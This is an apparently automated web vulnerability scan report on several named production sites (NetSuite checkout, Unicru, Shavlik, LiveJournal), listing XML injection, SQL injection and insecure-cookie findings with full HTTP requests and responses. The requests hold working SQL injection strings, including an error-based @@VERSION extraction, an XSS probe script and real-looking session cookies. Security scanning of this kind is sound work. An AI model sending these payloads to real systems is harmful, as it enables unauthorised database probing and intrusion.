Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 15:05:37 GMT
Content-Type: text/html; charset=utf-8
Retry-After: 0
X-Varnish: 1987947190
Age: 0
Via: 1.1 varnish
Content-Length: 368
Connection: keep-alive

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>200 OK</title>
</hea
...[SNIP]...

9.3. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://l-files.livejournal.net
Path:	/userapps/4/image

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /userapps/4]]>>/image?v=1297757136 HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 15:05:50 GMT
Content-Type: text/html; charset=utf-8
Retry-After: 0
X-Varnish: 1698422522
Age: 0
Via: 1.1 varnish
Content-Length: 368
Connection: keep-alive

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>200 OK</title>
</hea
...[SNIP]...

9.4. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://l-files.livejournal.net
Path:	/userapps/4/image

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /userapps/4/image]]>>?v=1297757136 HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 15:06:06 GMT
Content-Type: text/html; charset=utf-8
Retry-After: 0
X-Varnish: 610014231
Age: 0
Via: 1.1 varnish
Content-Length: 367
Connection: keep-alive

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>200 OK</title>
</hea
...[SNIP]...

10. SQL statement in request parameter previous next
There are 8 instances of this issue:

https://checkout.netsuite.com/core/media/media.nl
https://checkout.netsuite.com/core/styles/pagestyles.nl
https://checkout.netsuite.com/pages/portal/page_not_found.jsp
https://checkout.netsuite.com/s.nl
https://employer.unicru.com/asp/home/login.asp
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/index.cfm
http://learn.shavlik.com/shavlik/index.cfm

10.1. https://checkout.netsuite.com/core/media/media.nl previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://checkout.netsuite.com
Path:	/core/media/media.nl

Request

GET /core/media/media.nl?id=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&c=NLCORP&h=65bae699770c58b12c10 HTTP/1.1
Referer: https://checkout.netsuite.com/pages/portal/page_not_found.jsp?internal=F
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=fspzN1GhTphyBQvLpyGdlJdh6BL8whyTwq2X78f8hxRthNWT2Z3jy4GGPSzLlnVZdyGJQxSTzT2hfvnn6y9XwhnznRTRZbMw6QGzXJcyQ2jBFp97np87tTDKTCTHXpxD!-1598522165; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 14:28:11 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1700483469:616363742D6A6176613031362E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 1983

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=103&bglt=F2F4F6&bgmd=FFFFFF&bgdk=737A82
...[SNIP]...

10.2. https://checkout.netsuite.com/core/styles/pagestyles.nl previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://checkout.netsuite.com
Path:	/core/styles/pagestyles.nl

Request

GET /core/styles/pagestyles.nl?ct=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3=3 HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=pbWBN1GZpsFMMPGgD9fLtR1NsNxGljmTjF8P6kCVL9tLVKlFGB6qxvrttG2GmQHnFDK4npSP202Q0Q5SDBy6smMPTW80GnM5p2KvFCT1Xnpb36YTfw4s4JZlBHvMLJsr!1726784262; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:09 GMT
Server: Apache
Expires: Tue, 26 Apr 2011 06:15:09 GMT
Last-Modified: Mon, 25 Apr 2011 14:27:09 GMT
NS_RTIMER_COMPOSITE: 777140821:616363742D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css; charset=UTF-8
Content-Length: 69389

.iArrowLeft, .iArrowRight { display:inline-block; height:15px; width:16px; margin: 0 2px; background: url(/images/chiles/dashboard_icons.png) no-repeat; text-decoration: none; zoom:1}
.iArrowLeft { ma
...[SNIP]...

10.3. https://checkout.netsuite.com/pages/portal/page_not_found.jsp previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://checkout.netsuite.com
Path:	/pages/portal/page_not_found.jsp

Request

GET /pages/portal/page_not_found.jsp?internal=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: https://checkout.netsuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:02 GMT
Server: Apache
NS_RTIMER_COMPOSITE: 791381320:616363742D6A6176613034382E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2p9QN1GJ2Z3S12xNCxQXlL1Sv9knyGTvcHGHKQhgRRLQvyzhppkLn91h0g3vBgYBjvYSZNXQykRX2kdnyQtQ3vxTgnKhjWyvZHZrDRvvmfT79J0vzSz4Lp1DGswvblyw!-1046013267; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11320

<html><head><title>NetSuite | Page Not Found</title>
<meta name="robots" content="noindex,nofollow">
<link rel="STYLESHEET" type="text/css" href="/pages/portal/css/main.css">
</head>
<body bgcolor
...[SNIP]...

10.4. https://checkout.netsuite.com/s.nl previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://checkout.netsuite.com
Path:	/s.nl

Request

GET /s.nl?c=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&sc=4&whence=3&n=1&ext=T HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 14:27:02 GMT
Server: Apache
Location: https://checkout.netsuite.com/pages/portal/page_not_found.jsp?internal=F
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 339

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://checkout.netsuite.com/page
...[SNIP]...

10.5. https://employer.unicru.com/asp/home/login.asp previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://employer.unicru.com
Path:	/asp/home/login.asp

Request

POST /asp/home/login.asp HTTP/1.1
Referer: https://employer.unicru.com/asp/home/login.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: employer.unicru.com
Cookie: ASPSESSIONIDSSRCBTSB=CEAKPIJCCMCNNEOHIFEHAOEN; KTMDWestLB=1211368202.20736.0000; ASPSESSIONIDSSRADQTB=BCMNMKJCKPMBDHCEEMCKNLDG; Emp=datpwx=&UN=u662%3A%2F%2F0r652n4xr4%2Ep1z%2F0&SkipSSL=&PT=&CNAME=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&CID=&MultipleLocation=&RowsPerPage=&EUID=
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 201

image1=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&txtPassword=3&txtUsername=Smith

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:40:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 44
Content-Length: 3924
Content-Type: text/html
Set-Cookie: Emp=datpwx=&UN=fzv6u&SkipSSL=&PT=&CNAME=UnicruEmployer&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&CID=&MultipleLocation=&RowsPerPage=&EUID=; path=/
Cache-control: private

<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...

10.6. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Request

GET /hmc/report/?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

10.7. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Request

GET /hmc/report/index.cfm?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

10.8. http://learn.shavlik.com/shavlik/index.cfm previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://learn.shavlik.com
Path:	/shavlik/index.cfm

Request

GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

11. SSL cookie without secure flag set previous next
There are 27 instances of this issue:

https://checkout.netsuite.com/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl
https://checkout.netsuite.com/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl
https://checkout.netsuite.com/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl
https://checkout.netsuite.com/core/
https://checkout.netsuite.com/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl
https://checkout.netsuite.com/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl
https://checkout.netsuite.com/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl
https://checkout.netsuite.com/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl
https://checkout.netsuite.com/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl
https://checkout.netsuite.com/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl
https://checkout.netsuite.com/core/styles/pagestyles.nl
https://checkout.netsuite.com/pages/portal/css/main.css
https://checkout.netsuite.com/pages/portal/page_not_found.jsp
https://checkout.netsuite.com/s.nl
https://customer.kronos.com/Default.asp
https://employer.unicru.com/asp/home/login.asp
https://employer.unicru.com/asp/home/login.asp
https://employer.unicru.com/asp/home/login.asp
https://employer.unicru.com/asp/home/login.asp
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/index.cfm
https://www.fusionvm.com/FusionVM/
https://checkout.netsuite.com/s
https://customer.kronos.com/Default.asp
https://customer.kronos.com/user/forgotpassword.asp
https://customer.kronos.com/user/forgotusername.asp
https://customer.kronos.com/user/logindenied.asp

11.1. https://checkout.netsuite.com/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=L0xGN1TCcVCQPS8pHhg9qBGd76gpyCfS7FnHbzfnFl2LQNGjJvrzfh6fNyfBxr6h2LllvDnWDV1VRT3fh8GLJQYNFyskhxdG51gGXN5XF7N0GMrVt0mxL6vQyQSnT8pW!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:09:26 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2144347290:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=L0xGN1TCcVCQPS8pHhg9qBGd76gpyCfS7FnHbzfnFl2LQNGjJvrzfh6fNyfBxr6h2LllvDnWDV1VRT3fh8GLJQYNFyskhxdG51gGXN5XF7N0GMrVt0mxL6vQyQSnT8pW!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.2. https://checkout.netsuite.com/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=2RW7N1TCBHr6mQJSv4MJrzV9rnyz359DTygvK7qTzvf13vCc2x2x2JXm5QLhrNbJJQcTCgFLGHhsGp0VQ7FwRJ4b5TpDvcFrLL1Jh18S7vw1h5R7dYbgwShCL6v1QX0C!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:07:48 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2000683563:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2RW7N1TCBHr6mQJSv4MJrzV9rnyz359DTygvK7qTzvf13vCc2x2x2JXm5QLhrNbJJQcTCgFLGHhsGp0VQ7FwRJ4b5TpDvcFrLL1Jh18S7vw1h5R7dYbgwShCL6v1QX0C!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.3. https://checkout.netsuite.com/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=6gtrN1TV8C9xXWGTLVWNMvDTBLMyV755hCYflZPh1YC9G3WhlHnpqmr03yRfTfPYQpX2lCD12TQ2p4sh2qzn2CRFHBYp2ypxXQ0Ts2HJkxK7TM4GT0WGNXlr2vhsWDqh!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparkerd83f087f78ee474db97e8aec33de63c2.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:10:47 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110553779:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=6gtrN1TV8C9xXWGTLVWNMvDTBLMyV755hCYflZPh1YC9G3WhlHnpqmr03yRfTfPYQpX2lCD12TQ2p4sh2qzn2CRFHBYp2ypxXQ0Ts2HJkxK7TM4GT0WGNXlr2vhsWDqh!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.4. https://checkout.netsuite.com/core/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=hWd4N1GZGdsflwhjP8VdVGSnB6r2GzJ3SBh92hgS8gqlwWGNvByZJhtmP17wL8Hj9JwLc1dn5gjrrtXLMVZXhDnw7vvQwTP4mMBtPt3ds55G4vp4gF1Zr97r3DHpyLCR!-1220802186; path=/
NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:27:05 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /core/?nsextt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000013)%3C%2Fscript%3E HTTP/1.1
Referer: https://checkout.netsuite.com/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=31PwN1GWQvkMGP2pxGGpgHN2m48g811ybT9HCcv4R2jvLCt8R9y21ywBzs7v4v6KSnRPhyDpZb218XYJ9jkhnLpJpr8m7pxCsyyXnPNz1ChxGGXdMyLzThLVm6jGBpVG!1490567172; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:05 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 333241087:616363742D6A6176613031312E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=hWd4N1GZGdsflwhjP8VdVGSnB6r2GzJ3SBh92hgS8gqlwWGNvByZJhtmP17wL8Hj9JwLc1dn5gjrrtXLMVZXhDnw7vvQwTP4mMBtPt3ds55G4vp4gF1Zr97r3DHpyLCR!-1220802186; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:27:05 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2650

<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...

11.5. https://checkout.netsuite.com/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=9pncN1TcCnWLkfJJbLpSq1RR7PL6tyTTw0hR5QMhqLwnSDCyGTFJxJhYwyJYDpG2wJdSpSJy1FLV6lXT1thXwK1jrhJvlSP8KCMDHGZd8DVZ2nQZC2pLR3HTpPgQDCQp!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl HTTP/1.1
